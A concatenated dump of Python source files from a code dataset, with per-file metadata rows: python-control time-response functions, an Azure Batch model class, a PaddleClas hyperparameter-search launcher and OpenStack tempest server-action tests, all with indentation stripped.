# Undershoot : InfValue and undershoot must have opposite sign
y_us_index = (sgnInf * yout).argmin()
y_us = yout[y_us_index]
if (sgnInf * y_us) < 0:
undershoot = (-100. * y_us / InfValue)
else:
undershoot = 0
# Peak
peak_index = np.abs(yout).argmax()
peak_value = np.abs(yout[peak_index])
peak_time = T[peak_index]
# SteadyStateValue
steady_state_value = InfValue
retij = {
'RiseTime': rise_time,
'SettlingTime': settling_time,
'SettlingMin': settling_min,
'SettlingMax': settling_max,
'Overshoot': overshoot,
'Undershoot': undershoot,
'Peak': peak_value,
'PeakTime': peak_time,
'SteadyStateValue': steady_state_value
}
retrow.append(retij)
ret.append(retrow)
return ret[0][0] if retsiso else ret
def initial_response(sys, T=None, X0=0., input=0, output=None, T_num=None,
transpose=False, return_x=False, squeeze=None):
# pylint: disable=W0622
"""Initial condition response of a linear system
If the system has multiple outputs (MIMO), optionally, one output
may be selected. If no selection is made for the output, all
outputs are given.
For information on the **shape** of parameters `T`, `X0` and
return values `T`, `yout`, see :ref:`time-series-convention`.
Parameters
----------
sys : StateSpace or TransferFunction
LTI system to simulate
T : array_like or float, optional
Time vector, or simulation time duration if a number (time vector is
autocomputed if not given; see :func:`step_response` for more detail)
X0 : array_like or float, optional
Initial condition (default = 0). Numbers are converted to constant
arrays with the correct shape.
input : int
Ignored, has no meaning in initial condition calculation. Parameter
ensures compatibility with step_response and impulse_response.
output : int
Index of the output that will be used in this simulation. Set to None
to not trim outputs.
T_num : int, optional
Number of time steps to use in simulation if T is not provided as an
array (autocomputed if not given); ignored if sys is discrete-time.
transpose : bool, optional
If True, transpose all input and output arrays (for backward
compatibility with MATLAB and :func:`scipy.signal.lsim`). Default
value is False.
return_x : bool, optional
If True, return the state vector when assigning to a tuple (default =
False). See :func:`forced_response` for more details.
squeeze : bool, optional
By default, if a system is single-input, single-output (SISO) then the
output response is returned as a 1D array (indexed by time). If
squeeze=True, remove single-dimensional entries from the shape of the
output even if the system is not SISO. If squeeze=False, keep the
output as a 2D array (indexed by the output number and time) even if
the system is SISO. The default value can be set using
config.defaults['control.squeeze_time_response'].
Returns
-------
results : TimeResponseData
Time response represented as a :class:`TimeResponseData` object
containing the following properties:
* time (array): Time values of the output.
* outputs (array): Response of the system. If the system is SISO and
squeeze is not True, the array is 1D (indexed by time). If the
system is not SISO or ``squeeze`` is False, the array is 2D (indexed
by the output and time).
* states (array): Time evolution of the state vector, represented as
either a 2D array indexed by state and time (if SISO). Not affected
by ``squeeze``.
The return value of the system can also be accessed by assigning the
function to a tuple of length 2 (time, output) or of length 3 (time,
output, state) if ``return_x`` is ``True``.
See Also
--------
forced_response, impulse_response, step_response
Notes
-----
This function uses the `forced_response` function with the input set to
zero.
Examples
--------
>>> T, yout = initial_response(sys, T, X0)
"""
squeeze, sys = _get_ss_simo(sys, input, output, squeeze=squeeze)
# Create time and input vectors; checking is done in forced_response(...)
# The initial vector X0 is created in forced_response(...) if necessary
if T is None or np.asarray(T).size == 1:
T = _default_time_vector(sys, N=T_num, tfinal=T, is_step=False)
# Compute the forced response
response = forced_response(sys, T, 0, X0)
# Figure out if the system is SISO or not
issiso = sys.issiso() or (input is not None and output is not None)
# Store the response without an input
return TimeResponseData(
response.t, response.y, response.x, None, issiso=issiso,
transpose=transpose, return_x=return_x, squeeze=squeeze)
def impulse_response(sys, T=None, X0=0., input=None, output=None, T_num=None,
transpose=False, return_x=False, squeeze=None):
# pylint: disable=W0622
"""Compute the impulse response for a linear system.
If the system has multiple inputs and/or multiple outputs, the impulse
response is computed for each input/output pair, with all other inputs set
to zero. Optionally, a single input and/or single output can be selected,
in which case all other inputs are set to 0 and all other outputs are
ignored.
For information on the **shape** of parameters `T`, `X0` and
return values `T`, `yout`, see :ref:`time-series-convention`.
Parameters
----------
sys : StateSpace, TransferFunction
LTI system to simulate
T : array_like or float, optional
Time vector, or simulation time duration if a scalar (time vector is
autocomputed if not given; see :func:`step_response` for more detail)
X0 : array_like or float, optional
Initial condition (default = 0)
Numbers are converted to constant arrays with the correct shape.
input : int, optional
Only compute the impulse response for the listed input. If not
specified, the impulse responses for each independent input are
computed.
output : int, optional
Only report the step response for the listed output. If not
specified, all outputs are reported.
T_num : int, optional
Number of time steps to use in simulation if T is not provided as an
array (autocomputed if not given); ignored if sys is discrete-time.
transpose : bool, optional
If True, transpose all input and output arrays (for backward
compatibility with MATLAB and :func:`scipy.signal.lsim`). Default
value is False.
return_x : bool, optional
If True, return the state vector when assigning to a tuple (default =
False). See :func:`forced_response` for more details.
squeeze : bool, optional
By default, if a system is single-input, single-output (SISO) then the
output response is returned as a 1D array (indexed by time). If
squeeze=True, remove single-dimensional entries from the shape of the
output even if the system is not SISO. If squeeze=False, keep the
output as a 2D array (indexed by the output number and time) even if
the system is SISO. The default value can be set using
config.defaults['control.squeeze_time_response'].
Returns
-------
results : TimeResponseData
Impulse response represented as a :class:`TimeResponseData` object
containing the following properties:
* time (array): Time values of the output.
* outputs (array): Response of the system. If the system is SISO and
squeeze is not True, the array is 1D (indexed by time). If the
system is not SISO or ``squeeze`` is False, the array is 3D (indexed
by the output, trace, and time).
* states (array): Time evolution of the state vector, represented as
either a 2D array indexed by state and time (if SISO) or a 3D array
indexed by state, trace, and time. Not affected by ``squeeze``.
The return value of the system can also be accessed by assigning the
function to a tuple of length 2 (time, output) or of length 3 (time,
output, state) if ``return_x`` is ``True``.
See Also
--------
forced_response, initial_response, step_response
Notes
-----
This function uses the `forced_response` function to compute the time
response. For continuous time systems, the initial condition is altered to
account for the initial impulse.
Examples
--------
>>> T, yout = impulse_response(sys, T, X0)
"""
# Convert to state space so that we can simulate
sys = _convert_to_statespace(sys)
# Check to make sure there is not a direct term
if np.any(sys.D != 0) and isctime(sys):
warnings.warn("System has direct feedthrough: ``D != 0``. The "
"infinite impulse at ``t=0`` does not appear in the "
"output.\n"
"Results may be meaningless!")
# create X0 if not given, test if X0 has correct shape.
# Must be done here because it is used for computations below.
n_states = sys.A.shape[0]
X0 = _check_convert_array(X0, [(n_states,), (n_states, 1)],
'Parameter ``X0``: \n', squeeze=True)
# Compute T and U, no checks necessary, will be checked in forced_response
if T is None or np.asarray(T).size == 1:
T = _default_time_vector(sys, N=T_num, tfinal=T, is_step=False)
U = np.zeros_like(T)
# Set up arrays to handle the output
ninputs = sys.ninputs if input is None else 1
noutputs = sys.noutputs if output is None else 1
yout = np.empty((noutputs, ninputs, np.asarray(T).size))
xout = np.empty((sys.nstates, ninputs, np.asarray(T).size))
uout = np.full((ninputs, ninputs, np.asarray(T).size), None)
# Simulate the response for each input
for i in range(sys.ninputs):
# If input keyword was specified, only handle that case
if isinstance(input, int) and i != input:
continue
# Get the system we need to simulate
squeeze, simo = _get_ss_simo(sys, i, output, squeeze=squeeze)
#
# Compute new X0 that contains the impulse
#
# We can't put the impulse into U because there is no numerical
# representation for it (infinitesimally short, infinitely high).
# See also: http://www.mathworks.com/support/tech-notes/1900/1901.html
#
if isctime(simo):
B = np.asarray(simo.B).squeeze()
new_X0 = B + X0
else:
new_X0 = X0
U[0] = 1./simo.dt # unit area impulse
# Simulate the impulse response fo this input
response = forced_response(simo, T, U, new_X0)
# Store the output (and states)
inpidx = i if input is None else 0
yout[:, inpidx, :] = response.y
xout[:, inpidx, :] = response.x
# Figure out if the system is SISO or not
issiso = sys.issiso() or (input is not None and output is not None)
return TimeResponseData(
response.time, yout, xout, uout, issiso=issiso,
transpose=transpose, return_x=return_x, squeeze=squeeze)
# utility function to find time period and time increment using pole locations
def _ideal_tfinal_and_dt(sys, is_step=True):
"""helper function to compute ideal simulation duration tfinal and dt, the
time increment. Usually called by _default_time_vector, whose job it is to
choose a realistic time vector. Considers both poles and zeros.
For discrete-time models, dt is inherent and only tfinal is computed.
Parameters
----------
sys : StateSpace or TransferFunction
The system whose time response is to be computed
is_step : bool
Scales the dc value by the magnitude of the nonzero mode since
integrating the impulse response gives
:math:`\\int e^{-\\lambda t} = -e^{-\\lambda t}/ \\lambda`
Default is True.
Returns
-------
tfinal : float
The final time instance for which the simulation will be performed.
dt : float
The estimated sampling period for the simulation.
Notes
-----
Just by evaluating the fastest mode for dt and slowest for tfinal often
leads to unnecessary, bloated sampling (e.g., Transfer(1,[1,1001,1000]))
since dt will be very small and tfinal will be too large though the fast
mode hardly ever contributes. Similarly, change the numerator to [1, 2, 0]
and the simulation would be unnecessarily long and the plot is virtually
an L shape since the decay is so fast.
Instead, a modal decomposition in time domain hence a truncated ZIR and ZSR
can be used such that only the modes that have significant effect on the
time response are taken. But the sensitivity of the eigenvalues complicate
the matter since dlambda = <w, dA*v> with <w,v> = 1. Hence we can only work
with simple poles with this formulation. See Golub, Van Loan Section 7.2.2
for simple eigenvalue sensitivity about the nonunity of <w,v>. The size of
the response is dependent on the size of the eigenshapes rather than the
eigenvalues themselves.
By Ilhan Polat, with modifications by Sawyer Fuller to integrate into
python-control 2020.08.17
"""
sqrt_eps = np.sqrt(np.spacing(1.))
default_tfinal = 5 # Default simulation horizon
default_dt = 0.1
total_cycles = 5 # Number cycles for oscillating modes
pts_per_cycle = 25 # Number points divide period of osc
log_decay_percent = np.log(1000) # Reduction factor for real pole decays
if sys._isstatic():
tfinal = default_tfinal
dt = sys.dt if isdtime(sys, strict=True) else default_dt
elif isdtime(sys, strict=True):
dt = sys.dt
A = _convert_to_statespace(sys).A
tfinal = default_tfinal
p = eigvals(A)
# Array Masks
# unstable
m_u = (np.abs(p) >= 1 + sqrt_eps)
p_u, p = p[m_u], p[~m_u]
if p_u.size > 0:
m_u = (p_u.real < 0) & (np.abs(p_u.imag) < sqrt_eps)
if np.any(~m_u):
t_emp = np.max(
log_decay_percent / np.abs(np.log(p_u[~m_u]) / dt))
tfinal = max(tfinal, t_emp)
# zero - negligible effect on tfinal
m_z = np.abs(p) < sqrt_eps
p = p[~m_z]
# Negative reals- treated as oscillary mode
m_nr = (p.real < 0) & (np.abs(p.imag) < sqrt_eps)
p_nr, p = p[m_nr], p[~m_nr]
if p_nr.size > 0:
t_emp = np.max(log_decay_percent / np.abs((np.log(p_nr)/dt).real))
tfinal = max(tfinal, t_emp)
# discrete integrators
m_int = (p.real - 1 < sqrt_eps) & (np.abs(p.imag) < sqrt_eps)
p_int, p = p[m_int], p[~m_int]
# pure oscillatory modes
m_w = (np.abs(np.abs(p) - 1) < sqrt_eps)
p_w, p = p[m_w], p[~m_w]
if p_w.size > 0:
t_emp = total_cycles * 2 * np.pi / np.abs(np.log(p_w)/dt).min()
tfinal = max(tfinal, t_emp)
if p.size > 0:
t_emp = log_decay_percent / np.abs((np.log(p)/dt).real).min()
tfinal = max(tfinal, t_emp)
if p_int.size > 0:
tfinal = tfinal * 5
else: # cont time
sys_ss = _convert_to_statespace(sys)
# Improve conditioning via balancing and zeroing tiny entries
# See <w,v> for [[1,2,0], [9,1,0.01], [1,2,10*np.pi]]
# before/after balance
b, (sca, perm) = matrix_balance(sys_ss.A, separate=True)
p, l, r = eig(b, left=True, right=True)
# Reciprocal of inner product <w,v> for each eigval, (bound the
# ~infs by 1e12)
# G = Transfer([1], [1,0,1]) gives zero sensitivity (bound by 1e-12)
eig_sens = np.reciprocal(maximum(1e-12, einsum('ij,ij->j', l, r).real))
eig_sens = minimum(1e12, eig_sens)
# Tolerances
p[np.abs(p) < np.spacing(eig_sens * norm(b, 1))] = 0.
# Incorporate balancing to outer factors
l[perm, :] *= np.reciprocal(sca)[:, None]
r[perm, :] *= sca[:, None]
w, v = sys_ss.C @ r, l.T.conj() @ sys_ss.B
origin = False
# Computing the "size" of the response of each simple mode
wn = np.abs(p)
if np.any(wn == 0.):
origin = True
dc = np.zeros_like(p, dtype=float)
# well-conditioned nonzero poles, np.abs just in case
ok = np.abs(eig_sens) <= 1/sqrt_eps
# the averaged t->inf response of each simple eigval on each i/o
# channel. See, A = [[-1, k], [0, -2]], response sizes are
# k-dependent (that is R/L eigenvector dependent)
dc[ok] = norm(v[ok, :], axis=1)*norm(w[:, ok], axis=0)*eig_sens[ok]
dc[wn != 0.] /= wn[wn != 0] if is_step else 1.
dc[wn == 0.] = 0.
# double the oscillating mode magnitude for the conjugate
dc[p.imag != 0.] *= 2
# Now get rid of noncontributing integrators and simple modes if any
relevance = (dc > 0.1*dc.max()) | ~ok
psub = p[relevance]
wnsub = wn[relevance]
tfinal, dt = [], []
ints = wnsub == 0.
iw = (psub.imag != 0.) & (np.abs(psub.real) <= sqrt_eps)
# Pure imaginary?
if np.any(iw):
tfinal += (total_cycles * 2 * np.pi / wnsub[iw]).tolist()
dt += (2 * np.pi / pts_per_cycle / wnsub[iw]).tolist()
# The rest ~ts = log(%ss value) / exp(Re(eigval)t)
texp_mode = log_decay_percent / np.abs(psub[~iw & ~ints].real)
tfinal += texp_mode.tolist()
dt += minimum(
texp_mode / 50,
(2 * np.pi / pts_per_cycle / wnsub[~iw & ~ints])
).tolist()
# All integrators?
if len(tfinal) == 0:
return default_tfinal*5, default_dt*5
tfinal = np.max(tfinal)*(5 if origin else 1)
dt = np.min(dt)
return tfinal, dt
def _default_time_vector(sys, N=None, tfinal=None, is_step=True):
"""Returns a time vector that has a reasonable number of points.
if system is discrete-time, N is ignored """
N_max = 5000
N_min_ct = 100 # min points for cont time systems
N_min_dt = 20 # more common to see just a few samples in discrete time
ideal_tfinal, ideal_dt = _ideal_tfinal_and_dt(sys, is_step=is_step)
if isdtime(sys, strict=True):
# only need to use default_tfinal if not given; N is ignored.
if tfinal is None:
# for discrete time, change from ideal_tfinal if N too large/small
# [N_min, N_max]
N = int(np.clip(np.ceil(ideal_tfinal/sys.dt)+1, N_min_dt, N_max))
tfinal = sys.dt * (N-1)
else:
N = int(np.ceil(tfinal/sys.dt)) + 1
tfinal = sys.dt * (N-1) # make tfinal integer multiple of sys.dt
else:
if tfinal is None:
# for continuous time, simulate to ideal_tfinal but limit N
tfinal = ideal_tfinal
if N is None:
# [N_min, N_max]
N = int(np.clip(np.ceil(tfinal/ideal_dt)+1, N_min_ct, N_max))
return np.linspace(0, tfinal, N, endpoint=True)
| 39.023358 | 84 | 0.618558 |
e3dfaac3be8985031a4476b2dbb55999aee86f00 | 1,953 | py | Python | azure-mgmt-batch/azure/mgmt/batch/models/application.py | CharaD7/azure-sdk-for-python | 9fdf0aac0cec8a15a5bb2a0ea27dd331dbfa2f5c | [
"MIT"
] | 1 | 2017-10-29T15:14:35.000Z | 2017-10-29T15:14:35.000Z | azure-mgmt-batch/azure/mgmt/batch/models/application.py | Berryliao84/Python-Azure | a96ed6e8bbf4290372980a2919b31110da90b164 | [
"MIT"
] | null | null | null | azure-mgmt-batch/azure/mgmt/batch/models/application.py | Berryliao84/Python-Azure | a96ed6e8bbf4290372980a2919b31110da90b164 | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class Application(Model):
"""Contains information about an application in a Batch account.
:param id: A string that uniquely identifies the application within the
account.
:type id: str
:param display_name: The display name for the application.
:type display_name: str
:param packages: The list of packages under this application.
:type packages: list of :class:`ApplicationPackage
<azure.mgmt.batch.models.ApplicationPackage>`
:param allow_updates: A value indicating whether packages within the
application may be overwritten using the same version string.
:type allow_updates: bool
:param default_version: The package to use if a client requests the
application but does not specify a version.
:type default_version: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'packages': {'key': 'packages', 'type': '[ApplicationPackage]'},
'allow_updates': {'key': 'allowUpdates', 'type': 'bool'},
'default_version': {'key': 'defaultVersion', 'type': 'str'},
}
def __init__(self, id=None, display_name=None, packages=None, allow_updates=None, default_version=None):
self.id = id
self.display_name = display_name
self.packages = packages
self.allow_updates = allow_updates
self.default_version = default_version
| 40.6875 | 108 | 0.640041 |
abc406167946c82604f2e58f3835d4a37bbb694d | 5,289 | py | Python | tools/search_strategy.py | PaddlePaddle/PaddleCLS | 22531707527fb01f0e7f628509ed4b3d2b860316 | [
"Apache-2.0"
] | 1 | 2020-04-08T02:45:06.000Z | 2020-04-08T02:45:06.000Z | tools/search_strategy.py | PaddlePaddle/PaddleCLS | 22531707527fb01f0e7f628509ed4b3d2b860316 | [
"Apache-2.0"
] | null | null | null | tools/search_strategy.py | PaddlePaddle/PaddleCLS | 22531707527fb01f0e7f628509ed4b3d2b860316 | [
"Apache-2.0"
] | 1 | 2020-04-07T17:03:24.000Z | 2020-04-07T17:03:24.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
__dir__ = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.abspath(os.path.join(__dir__, '../')))
import subprocess
import numpy as np
from ppcls.utils import config
def get_result(log_dir):
log_file = "{}/train.log".format(log_dir)
with open(log_file, "r") as f:
raw = f.read()
res = float(raw.split("best metric: ")[-1].split("]")[0])
return res
def search_train(search_list,
base_program,
base_output_dir,
search_key,
config_replace_value,
model_name,
search_times=1):
best_res = 0.
best = search_list[0]
all_result = {}
for search_i in search_list:
program = base_program.copy()
for v in config_replace_value:
program += ["-o", "{}={}".format(v, search_i)]
if v == "Arch.name":
model_name = search_i
res_list = []
for j in range(search_times):
output_dir = "{}/{}_{}_{}".format(base_output_dir, search_key,
search_i, j).replace(".", "_")
program += ["-o", "Global.output_dir={}".format(output_dir)]
process = subprocess.Popen(program)
process.communicate()
res = get_result("{}/{}".format(output_dir, model_name))
res_list.append(res)
all_result[str(search_i)] = res_list
if np.mean(res_list) > best_res:
best = search_i
best_res = np.mean(res_list)
all_result["best"] = best
return all_result
def search_strategy():
args = config.parse_args()
configs = config.get_config(
args.config, overrides=args.override, show=False)
base_config_file = configs["base_config_file"]
distill_config_file = configs.get("distill_config_file", None)
model_name = config.get_config(base_config_file)["Arch"]["name"]
gpus = configs["gpus"]
gpus = ",".join([str(i) for i in gpus])
base_program = [
"python3.7", "-m", "paddle.distributed.launch",
"--gpus={}".format(gpus), "tools/train.py", "-c", base_config_file
]
base_output_dir = configs["output_dir"]
search_times = configs["search_times"]
search_dict = configs.get("search_dict")
all_results = {}
for search_i in search_dict:
search_key = search_i["search_key"]
search_values = search_i["search_values"]
replace_config = search_i["replace_config"]
res = search_train(search_values, base_program, base_output_dir,
search_key, replace_config, model_name,
search_times)
all_results[search_key] = res
best = res.get("best")
for v in replace_config:
base_program += ["-o", "{}={}".format(v, best)]
teacher_configs = configs.get("teacher", None)
if teacher_configs is None:
print(all_results, base_program)
return
algo = teacher_configs.get("algorithm", "skl-ugi")
supported_list = ["skl-ugi", "udml"]
assert algo in supported_list, f"algorithm must be in {supported_list} but got {algo}"
if algo == "skl-ugi":
teacher_program = base_program.copy()
# remove incompatible keys
teacher_rm_keys = teacher_configs["rm_keys"]
rm_indices = []
for rm_k in teacher_rm_keys:
for ind, ki in enumerate(base_program):
if rm_k in ki:
rm_indices.append(ind)
for rm_index in rm_indices[::-1]:
teacher_program.pop(rm_index)
teacher_program.pop(rm_index - 1)
replace_config = ["Arch.name"]
teacher_list = teacher_configs["search_values"]
res = search_train(teacher_list, teacher_program, base_output_dir,
"teacher", replace_config, model_name)
all_results["teacher"] = res
best = res.get("best")
t_pretrained = "{}/{}_{}_0/{}/best_model".format(base_output_dir,
"teacher", best, best)
base_program += [
"-o", "Arch.models.0.Teacher.name={}".format(best), "-o",
"Arch.models.0.Teacher.pretrained={}".format(t_pretrained)
]
elif algo == "udml":
if "lr_mult_list" in all_results:
base_program += [
"-o", "Arch.models.0.Teacher.lr_mult_list={}".format(
all_results["lr_mult_list"]["best"])
]
output_dir = "{}/search_res".format(base_output_dir)
base_program += ["-o", "Global.output_dir={}".format(output_dir)]
final_replace = configs.get('final_replace')
for i in range(len(base_program)):
base_program[i] = base_program[i].replace(base_config_file,
distill_config_file)
for k in final_replace:
v = final_replace[k]
base_program[i] = base_program[i].replace(k, v)
process = subprocess.Popen(base_program)
process.communicate()
print(all_results, base_program)
if __name__ == '__main__':
search_strategy()
| 37.246479 | 90 | 0.589525 |
a3f6486648a7c43a7119e885d12840c7fcdaf276 | 197 | py | Python | 51.py | renato-felix/PythonCursoEmVideo | 267b862c7afdde6d5f7e630e0a203fe923ca74a8 | [
"MIT"
] | null | null | null | 51.py | renato-felix/PythonCursoEmVideo | 267b862c7afdde6d5f7e630e0a203fe923ca74a8 | [
"MIT"
] | null | null | null | 51.py | renato-felix/PythonCursoEmVideo | 267b862c7afdde6d5f7e630e0a203fe923ca74a8 | [
"MIT"
] | null | null | null | a1 = int(input('Digite o primeiro termo da PA: '))
r = int(input('Digite a razão da PA: '))
an = 0
n = 0
for c in range(1, 11):
an = an + 1
n = n + 1
pa = a1 + (n - 1) * r
print(pa) | 21.888889 | 50 | 0.507614 |
deb21c72606c9f0ffc9e3e7757593eb82973bb72 | 36,593 | py | Python | tempest/api/compute/servers/test_server_actions.py | AurelienLourot/tempest | 4d14a22a1a0eb7aaa4aafb917273baa0739f55c3 | [
"Apache-2.0"
] | null | null | null | tempest/api/compute/servers/test_server_actions.py | AurelienLourot/tempest | 4d14a22a1a0eb7aaa4aafb917273baa0739f55c3 | [
"Apache-2.0"
] | null | null | null | tempest/api/compute/servers/test_server_actions.py | AurelienLourot/tempest | 4d14a22a1a0eb7aaa4aafb917273baa0739f55c3 | [
"Apache-2.0"
] | null | null | null | # Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from urllib import parse as urlparse
from oslo_log import log as logging
import testtools
from tempest.api.compute import base
from tempest.common import compute
from tempest.common import utils
from tempest.common.utils.linux import remote_client
from tempest.common import waiters
from tempest import config
from tempest.lib.common import api_version_utils
from tempest.lib.common.utils import data_utils
from tempest.lib import decorators
from tempest.lib import exceptions as lib_exc
CONF = config.CONF
LOG = logging.getLogger(__name__)
class ServerActionsTestJSON(base.BaseV2ComputeTest):
"""Test server actions"""
def setUp(self):
# NOTE(afazekas): Normally we use the same server with all test cases,
# but if it has an issue, we build a new one
super(ServerActionsTestJSON, self).setUp()
# Check if the server is in a clean state after test
try:
waiters.wait_for_server_status(self.client,
self.server_id, 'ACTIVE')
except lib_exc.NotFound:
# The server was deleted by previous test, create a new one
# Use class level validation resources to avoid them being
# deleted once a test is over
validation_resources = self.get_class_validation_resources(
self.os_primary)
server = self.create_test_server(
validatable=True,
validation_resources=validation_resources,
wait_until='ACTIVE')
self.__class__.server_id = server['id']
except Exception:
# Rebuild server if something happened to it during a test
self.__class__.server_id = self.recreate_server(
self.server_id, validatable=True)
def tearDown(self):
super(ServerActionsTestJSON, self).tearDown()
# NOTE(zhufl): Because server_check_teardown will raise Exception
# which will prevent other cleanup steps from being executed, so
# server_check_teardown should be called after super's tearDown.
self.server_check_teardown()
@classmethod
def setup_credentials(cls):
cls.prepare_instance_network()
super(ServerActionsTestJSON, cls).setup_credentials()
@classmethod
def setup_clients(cls):
super(ServerActionsTestJSON, cls).setup_clients()
cls.client = cls.servers_client
@classmethod
def resource_setup(cls):
super(ServerActionsTestJSON, cls).resource_setup()
cls.server_id = cls.recreate_server(None, validatable=True)
@decorators.idempotent_id('6158df09-4b82-4ab3-af6d-29cf36af858d')
@testtools.skipUnless(CONF.compute_feature_enabled.change_password,
'Change password not available.')
def test_change_server_password(self):
"""Test changing server's password
The server's password should be set to the provided password and
the user can authenticate with the new password.
"""
# Since this test messes with the password and makes the
# server unreachable, it should create its own server
validation_resources = self.get_test_validation_resources(
self.os_primary)
newserver = self.create_test_server(
validatable=True,
validation_resources=validation_resources,
wait_until='ACTIVE')
self.addCleanup(self.delete_server, newserver['id'])
# The server's password should be set to the provided password
new_password = 'Newpass1234'
self.client.change_password(newserver['id'], adminPass=new_password)
waiters.wait_for_server_status(self.client, newserver['id'], 'ACTIVE')
if CONF.validation.run_validation:
# Verify that the user can authenticate with the new password
server = self.client.show_server(newserver['id'])['server']
linux_client = remote_client.RemoteClient(
self.get_server_ip(server, validation_resources),
self.ssh_user,
new_password,
server=server,
servers_client=self.client)
linux_client.validate_authentication()
def _test_reboot_server(self, reboot_type):
if CONF.validation.run_validation:
validation_resources = self.get_class_validation_resources(
self.os_primary)
# Get the time the server was last rebooted,
server = self.client.show_server(self.server_id)['server']
linux_client = remote_client.RemoteClient(
self.get_server_ip(server, validation_resources),
self.ssh_user,
self.password,
validation_resources['keypair']['private_key'],
server=server,
servers_client=self.client)
boot_time = linux_client.get_boot_time()
# NOTE: This sync is for avoiding the loss of pub key data
# in a server
linux_client.exec_command("sync")
self.client.reboot_server(self.server_id, type=reboot_type)
waiters.wait_for_server_status(self.client, self.server_id, 'ACTIVE')
if CONF.validation.run_validation:
# Log in and verify the boot time has changed
linux_client = remote_client.RemoteClient(
self.get_server_ip(server, validation_resources),
self.ssh_user,
self.password,
validation_resources['keypair']['private_key'],
server=server,
servers_client=self.client)
new_boot_time = linux_client.get_boot_time()
self.assertGreater(new_boot_time, boot_time,
'%s > %s' % (new_boot_time, boot_time))
@decorators.attr(type='smoke')
@decorators.idempotent_id('2cb1baf6-ac8d-4429-bf0d-ba8a0ba53e32')
def test_reboot_server_hard(self):
"""Test hard rebooting server
The server should be power cycled.
"""
self._test_reboot_server('HARD')
@decorators.idempotent_id('1d1c9104-1b0a-11e7-a3d4-fa163e65f5ce')
def test_remove_server_all_security_groups(self):
"""Test removing all security groups from server"""
server = self.create_test_server(wait_until='ACTIVE')
# Remove all Security group
self.client.remove_security_group(
server['id'], name=server['security_groups'][0]['name'])
# Verify all Security group
server = self.client.show_server(server['id'])['server']
self.assertNotIn('security_groups', server)
def _rebuild_server_and_check(self, image_ref):
rebuilt_server = (self.client.rebuild_server(self.server_id, image_ref)
['server'])
waiters.wait_for_server_status(self.client, self.server_id, 'ACTIVE')
msg = ('Server was not rebuilt to the original image. '
'The original image: {0}. The current image: {1}'
.format(image_ref, rebuilt_server['image']['id']))
self.assertEqual(image_ref, rebuilt_server['image']['id'], msg)
def _test_rebuild_server(self):
# Get the IPs the server has before rebuilding it
original_addresses = (self.client.show_server(self.server_id)['server']
['addresses'])
# The server should be rebuilt using the provided image and data
meta = {'rebuild': 'server'}
new_name = data_utils.rand_name(self.__class__.__name__ + '-server')
password = 'rebuildPassw0rd'
rebuilt_server = self.client.rebuild_server(
self.server_id,
self.image_ref_alt,
name=new_name,
metadata=meta,
adminPass=password)['server']
# If the server was rebuilt on a different image, restore it to the
# original image once the test ends
if self.image_ref_alt != self.image_ref:
self.addCleanup(self._rebuild_server_and_check, self.image_ref)
# Verify the properties in the initial response are correct
self.assertEqual(self.server_id, rebuilt_server['id'])
rebuilt_image_id = rebuilt_server['image']['id']
self.assertTrue(self.image_ref_alt.endswith(rebuilt_image_id))
self.assert_flavor_equal(self.flavor_ref, rebuilt_server['flavor'])
# Verify the server properties after the rebuild completes
waiters.wait_for_server_status(self.client,
rebuilt_server['id'], 'ACTIVE')
server = self.client.show_server(rebuilt_server['id'])['server']
rebuilt_image_id = server['image']['id']
self.assertTrue(self.image_ref_alt.endswith(rebuilt_image_id))
self.assertEqual(new_name, server['name'])
self.assertEqual(original_addresses, server['addresses'])
if CONF.validation.run_validation:
validation_resources = self.get_class_validation_resources(
self.os_primary)
# Authentication is attempted in the following order of priority:
# 1.The key passed in, if one was passed in.
# 2.Any key we can find through an SSH agent (if allowed).
# 3.Any "id_rsa", "id_dsa" or "id_ecdsa" key discoverable in
# ~/.ssh/ (if allowed).
# 4.Plain username/password auth, if a password was given.
linux_client = remote_client.RemoteClient(
self.get_server_ip(rebuilt_server, validation_resources),
self.ssh_alt_user,
password,
validation_resources['keypair']['private_key'],
server=rebuilt_server,
servers_client=self.client)
linux_client.validate_authentication()
@decorators.idempotent_id('aaa6cdf3-55a7-461a-add9-1c8596b9a07c')
def test_rebuild_server(self):
"""Test rebuilding server
The server should be rebuilt using the provided image and data.
"""
self._test_rebuild_server()
@decorators.idempotent_id('30449a88-5aff-4f9b-9866-6ee9b17f906d')
def test_rebuild_server_in_stop_state(self):
"""Test rebuilding server in stop state
The server in stop state should be rebuilt using the provided
image and remain in SHUTOFF state.
"""
server = self.client.show_server(self.server_id)['server']
old_image = server['image']['id']
new_image = (self.image_ref_alt
if old_image == self.image_ref else self.image_ref)
self.client.stop_server(self.server_id)
waiters.wait_for_server_status(self.client, self.server_id, 'SHUTOFF')
rebuilt_server = (self.client.rebuild_server(self.server_id, new_image)
['server'])
# If the server was rebuilt on a different image, restore it to the
# original image once the test ends
if self.image_ref_alt != self.image_ref:
self.addCleanup(self._rebuild_server_and_check, old_image)
# Verify the properties in the initial response are correct
self.assertEqual(self.server_id, rebuilt_server['id'])
rebuilt_image_id = rebuilt_server['image']['id']
self.assertEqual(new_image, rebuilt_image_id)
self.assert_flavor_equal(self.flavor_ref, rebuilt_server['flavor'])
# Verify the server properties after the rebuild completes
waiters.wait_for_server_status(self.client,
rebuilt_server['id'], 'SHUTOFF')
server = self.client.show_server(rebuilt_server['id'])['server']
rebuilt_image_id = server['image']['id']
self.assertEqual(new_image, rebuilt_image_id)
self.client.start_server(self.server_id)
# NOTE(mriedem): Marked as slow because while rebuild and volume-backed is
# common, we don't actually change the image (you can't with volume-backed
# rebuild) so this isn't testing much outside normal rebuild
# (and it's slow).
